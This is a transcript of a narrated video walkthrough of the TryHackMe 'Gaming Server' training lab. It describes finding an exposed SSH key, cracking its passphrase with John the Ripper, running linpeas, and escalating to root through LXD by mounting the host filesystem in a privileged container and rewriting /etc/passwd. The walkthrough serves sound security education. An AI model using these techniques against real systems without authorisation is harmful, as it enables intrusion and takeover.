TryHackMe GAMING SERVER - LXD Privilege Escalation

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hello everybody my name is john hammond and welcome back from the youtube video we're looking at some more try hack me and this is a new room it's out for a few days now i'm bummed because there are some write-ups out already i didn't make it right to the punch but uh this is gonna be showcasing gaming server which was a super fun room sure its difficulty is rated easy but i think there were some really cool nuggets in here so i want to work through this with you i have the ip address and the room already started so let's go ahead and jump in i'll start off like i always do by making a room for a folder and a directory to work for work in in this room wow we're already doing really really well getting words and speech to happen so i'm gonna create a simple readme file where i will just kind of keep track of my notes and things um and let's start off with a simple ruscan to kind of see what open ports we're working with looks like we have port 22 open and port 80 open so that is good to know i will go ahead and get started with some simple nikto and durbuster or go buster scans so we do some uh automatic enumeration kicking off in the background while we are gonna also do our own manual enumeration so i'll start off with nikto in that one window and i will start off with go buster in this window i'll use dur as the notion to make it okay work in directory mode pass and attack you to specify the url and the word list that i'll use so i'll use the directory list medium that typically ships with door buster okay now we can go to some manual enumeration and poke around ourselves this is the ip address open it up in a web browser and i'm greeted with this dragon website lorem ipsum okay uh so there's not a whole lot of actual content here other than i guess some pages to access just more lorem ipsum text nonsense is there a read more page that okay link says me to archive this links me to about i can see down the bottom left of my screen here myths and that takes me nowhere okay um i will hit control u just to kind of view the source here kind of see if there's anything interesting in the html i think that's always good practice same thing with always checking out static files like the css and javascript maybe sure you don't see anything like crazy cool in there or it's boring and that it's a static file it's not gonna do anything dynamic in the case of css specifically um but it's always i think good practice just to check in case they hide anything in there oh and actually it's a good thing that we did there's an html comment here john please add some actual content to the site lorem ipsum is horrible to look at great this is awfully meta they're talking to me john so maybe that's worthwhile maybe that's going to be a username we could work with um checking out those other pages i'll zoom out here i see uh the index page that brings us to this archives page that's apparently just not a thing uh what about that about.html there's a video here that is not a video incredible uh and an uploads page oh okay so sorry i don't know if that was visible with my face in the way there's an uploads page that i can just click on and it took me to this location slash uploads and that had some interesting files in there i wonder if there's like an upload functionality that we could get into there's a meme.jpg which should obviously be the first thing that we look at thanks that that's great manifesto.txt oh and this is just the hacker manifesto very very cool it's a plain text file so if i were to view the source there's nothing else in here if you really really wanted to sure you could slap it in to a text editor and see if they're doing any tricks like hiding white space steganography or anything nothing there so that's nothing we need to worry about but kind of a nice little easter egg if you're in the hacker manifesto i like that i dig that and there's this dick dot list which seemingly looks like a word list or dictionary list for potential passwords i like this uh like season and then year that's kind of known now as a pretty common technique for passwords that you might be using because you just look out the window and say oh it's snowing outside it's winter 2020 or whatever so this would be worthwhile let's go ahead and save this i'm gonna go back to my directory here and i'll w get this down so that's downloaded there we go i have a dick dot list and all of those files there we have nikto's results here that found a robots.txt location so let's hop over to robots.txt i typed in ribbit okay and that just tells me to look at this uploads directory that we were already in and pilfering out of cool seemingly nothing else in that there durbuster or go buster found uploads and also found secret oh what is that slash secret there we go okay and that's in the directory listing with the secret key and that is a private key okay awesome so let's totally w get that down as well wget grab that guy and we knew that there was ssh open right yeah we saw that our nmap scan or ruscan which will funnel to nmap and we have a potential username and we also have a potential password list and we have this potential secret key so i guess it's worth a try seeing if we can ssh into this machine let me grab that ip address there we go with the secret key um and specifying the host and john as the username my username is john on my machine so i don't really need to supply that but it's a good thing that i do to be explicit you know oh oh oh and i need to mark that as uh like our specific key so chmod 600 so it has the permissions of just my user to be able to do that there we go now i can run that one more time and that private key needs a password okay so that's not a big deal we know that we have a word list we could use so let's run john the ripper i have john the ripper downloaded and installed in my op directory that's where i tend to put all of my tools uh so in their run folder there is an ssh to john python script that will allow you to take a private key and put into a format that john the ripper can handle and then you could throw a wordless at it and hopefully it could crack a password or figure something out so let me run ssh to john on that secret key and i get this big big big big amount of output but that's going to put it in a format that john the ripper can work with so i will take that exact same command and i'll redirect it out to a file like for john.txt okay then i can just simply run john the ripper on that for john.txt file that i just created and i'll specify the word list we want to use as that dictionary dot lst was that the name of it uh i'm just going to control c to check yes dict.lst so run that guy and we'll see if he gets a password and he does okay so the password for that private key is let me in great so let's uh ssh tag i with our secret key to john at that ip address and that's on my clipboard thank you enter passphrase we know that has now let me in great i should be taking notes on all this i i literally didn't uh i created that readme.txt file a readme.md and didn't do anything with it so since we have initial access since we are logged in as this john user we're able to ssh in we are now on the box and we can look at his home directory and we have this user.txt so cutting that out we can go submit that as the user flag great okay uh now we'll want to do some usual manual or automatic automated uh enumeration uh i'll start with the immediate low-hanging fruit just to see can i run sudo and he needs a password and we don't know his password we only know the password for that private key so that doesn't work i could type in something like please subscribe but unfortunately that's not his password but it is my password so if you want to subscribe that might help shameless plug um now let's go actually do some automated enumeration so i will go ahead and upload a lin pease or an automatic enumeration script like lynn p's or linum lin pease is great and fantastic so i will do that i'll do that with my poor man's pen test style all that's really doing is going to create one protocol or one kind of communication transfer setup i could be using netcat to just listen on my attacker machine and send or listen on excuse me listen on the host on the victim and then maybe like send along the file just cut it out to another network or netcat connection and then it'll save it or pull it onto that file i can redirect it out or you can do the same thing with wget just to download a file you can do the same thing with ftp or http do wget right or smb etc enough background let's actually run the command again i store lin p's in my op directory so let's slap that in and he's going to throw it in dev shm great um let me just check quake is good so that's sent um i'm gonna move into devshm and i might still have some files in there from when i did this momentarily moments ago so let me just run that one more time super sorry ruined uh ruined the illusion there but now we've got lin p's let me mark that as executable chmod plus x and i'll go ahead and run it and save that output i'll just pipe it to t so i can see the standard output and it'll be funneled into a file so there we go i do not have the entire linp script apparently uh when this happens i just like to check with md5 sum on the original file that's on the host and on my attacker machine yeah those are different so let me upload that one more time slap that along that's sent now now does the md5some command give me the same hash it does okay great so let's actually run our lin piece script now there we go the beautiful p that shows up and we're cranking through i'll let this run for a little bit but i will scroll up to the top and see what we can work with i know reading linp's output might be like weird and intimidating and there's a lot to look through obviously if you kind of aren't familiar with it especially knowing what's normal and what's not so like thankfully lin pease does a really good job of like giving you a legend or like a color coding as to what might be potentially useful in this case looks like we are running our operating system of linux that kernel version and it's ubuntu 1804 i'm running as that john user and i'm in the sudo group but i don't know his password so i wasn't able to run pseudo commands i'm also in lxd or lxd which is a kind of technology used for creating containers and docker is like a similar tool maybe that's going to be an outlet it looks like that is notified as hey this is a huge pe vector you could potentially do some stuff with lxd let me tune into that later but first let's continue scrolling through lin p's pseudo version is seemingly old maybe we could abuse that cpu information nothing sticks out same thing in the environment these are all just regular normal environment variables we can see here that we are aslr enabled or address space layout randomization that might get in the way if we were to do some like nifty crazy binary exploitation stuff but i don't think we need to do that in this case blah blah blah all the processes that are running www.data is the one that's actually running apache right now so that's the web server cron jobs oftentimes we might see like interesting backups or things that get in the way looks like there's nothing out of the ordinary there same thing with services nothing highlighted or enumerated blah blah blah same thing in etc hosts nothing out of the ordinary lots of running things my user again pseudo is present and so is lxd pk exec policy maybe that's going to be something interesting looks like these are the only users here so john this user that i'm running as in root are the only ones that have been bash and the output of it etcetera password that's it so okay okay okay nothing immediately stands out yes we know we have our private ssh key we already got that nothing nothing nothing set uid binary see if there's anything interesting easy low hanging fruit there nothing immediately stands out again all the stuff is kind of normal same thing with set group id oh interesting that we have vim information lxce cookies ah okay so maybe a little bit more pointing towards lxc and lxd that's a lot of output a lot of stuff and we can move on okay so now that that illusion is over uh let's talk a little bit more about that lxc or lxd prives this is a thing right this is kind of well known and well documented there is a lot of stuff on this uh if i go check out this exploit db entry there's immediately kind of some option that we have here uh this is a bash script but it tells you like you have to do a little bit of stuff on your own attacker machine to be able to prep this this will actually have you go download some tool and utility that'll allow you to actually build alpine like build an image or the framework for a container to run in an lxc right that technology and software that will be able to run containers the same thing that you might do when you're performing like a docker prives because it because that is kind of a tight security thing you have a lot of functionality when you're creating those and running those containers uh you could potentially end up mapping the entire file system into the container so you essentially could have root privileges because you can modify things as root inside your container and that's going to still take effect of the actual file system that you've mounted or you could just peruse the file system which is something that we could do to actually find that root flag or become that root user so that's going to be kind of interesting and kind of fun we could do that looks like they're using this build alpine script so this is out of an original github repository so let me actually go to that and check it out i'll go to github.com slap in that location here this will build an alpine linux image for us okay so let's clone this and work with it i am oh nico found secret nice go buster and nico both found secret i don't think we need to do anything more with those because it uh we already are on the box so let's go ahead and get clone this guy and looks like we just have this dot slash build alpine can i run this build alpine you must be run as root okay let's do a little pseudo here actually before i do that i want to at least present this good practice to you is if you know you're running a shell script as root you should probably at least take a gander as to what it's doing make sure it's not going to fork bomb or rmrf or destroy things or completely clobber your machine with ransomware looking through this and considering it's on github and it's kind of a trusted thing looks like it got a decent amount of stars and forks uh decent amount of contributors you shouldn't sure practice you you shouldn't blindly sudo a shell script especially like curling something or like downloading an install script and just pipe it to bash that's also sometimes a bad idea but okay this looks totally fine nothing no rm tac rf on my forward slash uh my removing my entire file system anyway let's go ahead and sudo this guy i'll type in my password now that i trust this and it'll go do its thing um this failed so i don't know if you're gonna have this exact same predicament but when the script would run for me it would automatically select a mirror that wasn't a good mirror it would either just hang or it would just kind of like fail so what this ends up doing is if you kind of follow through that code and you'll notice it created a new root fs folder in here so i'm gonna go into that and it just looks like a file system right it's it's the root file system that script though that we opened up when i look at the mirrors let me uh ctrl f4 mirror here it's pulling it out of the root file system user share alpine mirrors and mirrors dot text so let me go ahead and cat that out i don't need the forward slash in this case because i'm gonna be talking relative not my absolute path i have a lot of stuff in here let me sublime that out uh oh and i actually used the real forward slash that time so i'm just gonna open this up in a text editor and i'm gonna remove a lot of the mirrors until i know maybe one that will work and one will actually download things i'll just leave the top one in this case now i'll go ahead and run that script one more time getting back to that parent directory let's see if this will be able to download it properly okay looks like it's moving it's cruising along and it's going to prepare this alpine image for me awesome now in my current directory i have this big alpine dot tar.gz file now we could go ahead and put this on the victim or target machine normally sure you could go ahead and create a container or an image with lxc or docker and it'll just pull it down from the internet but keep in mind these don't actually have uh internet being inside of the try hacking network inside of that vpn i had a thought and i was like poking around with this when i was going through it live or previously on my own right i thought like well this would be kind of cool and fun to just go ahead and create a socks proxy or like funnel my internet through my attacker into the victim and the target machine so that it would be able to download things you can set like http proxy and https proxy and that might work uh you can do that with like then run commands with curl or w getting be able to interact with it natively um but i don't think lxc was able to pull down an image through that anyway if you guys have any interest in that i could showcase a video where i'm putting together that sox proxy and then using that on the victim so the target and the reverse shell that you're working with even if it doesn't have internet you can basically run primitive commands like curl or wget and be able to access the internet you can apt update or install calce or whatever the heck you want terminal parrot if you like to meme and troll that's a thing and maybe we could do a video on that if you guys have an interest in that anyway let's continue to do what we were doing we've got this image created and we have created this so that we don't need to use the internet when lxc tries to create a container or an image from this it can just take it locally from this file so let's go ahead and throw that on the box what i'll do is i'll go ahead and set up a python http server my ip address so that i know and so that like you know in your case you'll grab your attacker's machine now that that's serving this is going to end up being like another thing to download or get a file here i'll use wget on the victim and actually let me mark this as a black so you know that's the victim hopefully that's not too confusing grab on that port that we're serving this little tiny tiny web server let's go ahead and grab that alpine image here that we've downloaded okay so that's going to pull that all down looks like my web server saw the request my face is in the way and you can see the victim is downloading that right now while that's going let's go ahead and kind of take another look at what we can do to perform this privilege escalation this script might do some peculiar things where it's going to import the file name that's applied with an alias and trying to initialize it it'll try to create that alpine image with the container name of privesk and it's going to set that security privileged equals true and try to add the victim and like the real target here file system mounted inside of that container and mount root so that it would be able to access it from inside the container kind of cool then we'll go ahead and start that and they'll go ahead and execute a command on there so we get access into it what we could do is we could go ahead and try this let me uh i guess grab this code and let's on our attacker machine let's subtle like uh oh i'm in the alpine server there let's call this like lxc privesque or something dot sh slap that in and let's move up a directory and run that exact same server so now i can download this lxc proves on the victim lxc privesque dot ch great he's pulled that down and let's try and mark that as executable and now let's go ahead and try and run that script looks like we need to supply the file name and we have this big big alpine image file now so let's alpine that supply that with that tac f argument see if it uh created it looks like it did it listed all the images that we have here we've just imported that one successfully and we added that forward slash note the victim file system inside the container and then we jumped into the context of the controller because we executed privesque and privesque is our container name and sh to give us a simple shell here so now that we kind of read through and understood what that script was doing we are in the container and we can now go ahead and move around so nothing in my current directory i'm root right but i am root inside of this container remember if i were to move up in the other directory i can move into home and you won't see that john user if i were to cat out etc password you won't see anything else because we are inside this container and not the actual target original machine that we were in but we had mounted the root file system in slash mount root so i could move in there and now i'm in the actual file system of the original target of the real victim and i can move into their root home directory because i have permission to do that now and i could just grab that root.txt neat very cool that's how we could just take advantage in proves on this box keep in mind sure you're only doing that in the context of uh the container but since we have access to their file system hooray we completed the room congratulations everybody since we have access to this file system we could modify that etc password and maybe change the password for the root user let me do that just to see if it'll uh make some sense here so i'm moving into etc password within this container i'll cat out the current settings of password you can see this john user there and that's not me that's that john user on the victim so let me grab all of this data i know it's gross but i'll slap it into sublime text and then on my host i'll go ahead and fire up python so i'm going to use python so that i can import crypt and crypt is going to end up being that same library that creates the password hashes and sha format and stuff that's going to be used regularly inside of etc password or etc shadow we could read it set reshadow and maybe i guess sure you could modify and change that but i think doing it instead of password is just kind of easier and more sane you can see john's password hash and maybe i guess we could crack his password hash if we wanted to because we still don't know his password but we can go ahead and set one for root and that might be kind of cool let's finish what i was saying sorry inside of python we've imported crypt and now i could use crypt.crypt calculate that hash or the cryptographic value for a specific password i'll just set my password to please sub please subscribe and now that string this is it returns back out to us is what we could use for the value of that root user so let me patch this into where the x would be and that's where normally you would see the password if you were doing if you had that access to it set reshadow now that that's created what i'm going to do is i'm going to try and run nano inside of that target container let me see if i can actually run nano or will it break nope i don't have that okay do i have echo i probably do so i'll do use a little here doc i'll use cat up to end of file and then i'll pump that into etc password maybe i will break the machine if i mess this up hopefully i don't so now that i'm in that little midway intermediary prompt i can just paste all this in and i will type in eof to denote the end of file great now i can cut out etc password and hopefully i didn't clobber or destroy it looks like i was okay and our root user now has a set password syntax in there great so at this point hopefully i can break out of my container okay okay and i can change user to root and the password that i have set is please sub did i fat finger that oh no can i s you bash well i mean s u please sup no okay let's change the game here then um we could just totally easily change our like john and that command that we that we ran here lxe prives tak f alpine just to get that container back there we go now let's cd into itself password or cd mount root and let's change that to that john user oh goodness grab that password slap it in for the john user so i know it or we could crack his password we could kind of use whatever technique we wanted to etc password did i accidentally throw that into slash etc password is that why that didn't work it is oh you guys should have told me you guys should have told me maybe it was right all along and i'm just an idiot uh let's let's find out let's use our here doc again so cat eof to password and now i have that pre-planned password into both root and john so let me throw that in end that with eof great now let's exit and i can trust that this should work s u without it please sub no okay can i pseudo bash please sub what the what okay what does it say a password look like on this box what are you doing dude oh no it doesn't have my dollar sign sixes because we're entering that in bash and bash is going to interpret those dollar signs as if they were variables so this syntax is gone let's all right third time's a charm third time's a charm guys let's run it one more time back in the container let's include our backslashes there is there anything else that was weird and funky there let me just grab this syntax and kind of put it side by side to test it i had up to this position is there something else missing oh another there's another dollar sign there are there any other dollar signs anything else that i'm missing it doesn't look like it if i miss it again then we'll go for four times a charm uh how about that backslash is that noted there or that's that's just a regular forward slash that's not a concern okay okay now pretty please pray to the demo gods kyle let's move into mount root and move into that etc page and let's do our here doc password slap that bad boy in to the classic eof now let's cut out password and do a sanity check before we remove this thing now our dollar signs are in place let me verify that this line is the exact same as it should be within sublime text i'll remove our dollar signs and that line should be identical so if i search for that do i see it with regex turned off it is perfectly fine okay great now hopefully clearing that out like once again insanity check cutting etc password my dollar signs are present let me see if i can su and use the password please sub i'm gonna type that one more time to not fat finger it and i'm rude all right awesome thanks everybody now we're actually root on the actual host target victim without needing to uh that needed to go through the container that was a lot of fun i hope you guys kind of enjoyed that uh i i know when i'm like fumbling around and like messing up at the very very last part or whatever uh people say i think that's i personally think it's stupid and annoying and it's not fun to watch but you guys say hey it's really really cool to actually see you rework and and problem solve and stuff like that so i hope that was fun now we got the real root.text actually on the box not through the container so we did it we finished that room and i think that was a lot of fun i don't have a whole lot of practice with some of those lxc priv desks and if we wanted to sure we could take a look at some of the walkthroughs that other pokes other folks would use and that's a lot of the fun of doing this and learning and see what other tools people use looks like fuff was in there i'm sure some w fuzz okay and they're using the same sort of setup with that lxc yep yep yep yep yep that's really neat that's really cool that's really fun i like this room a lot uh i don't do a lot with lxc containers but it's very very cool to see that prive esk every now and again man the benefit of try hack me is that hey you can take a look at uh how other people solved it and they're all about kind of like education and learning first so if you ever want to take a look at the write-up if you're banging your head against the wall for too long that's an option i dig it i love it sweet thank you so so much everybody thanks you for thanks for watching thanks for hanging out it's been great i i'm late on getting a video out so i wanted to just like hey let's let's run through this thing and i hope it wasn't too bad being an easy room maybe that lxc pro desk was kind of neat and there's a lot of documentation that a lot of resources and material out on that sort of thing so please go google around please go practice please go learn and uh thanks so much for watching if you guys did like this video please do do those youtube algorithm things maybe smash that like button maybe smush boop or bonk that like button uh leave a comment subscribe you know i'd be super duper grateful and uh that's enough for now thanks for watching everybody i'll see you in the next video love you [Music] with you

Info

Channel: John Hammond

Views: 114,114

Rating: 4.9511495 out of 5

Keywords:

Id: 58-145bvu_8

Channel Id: undefined

Length: 34min 49sec (2089 seconds)

Published: Tue Sep 01 2020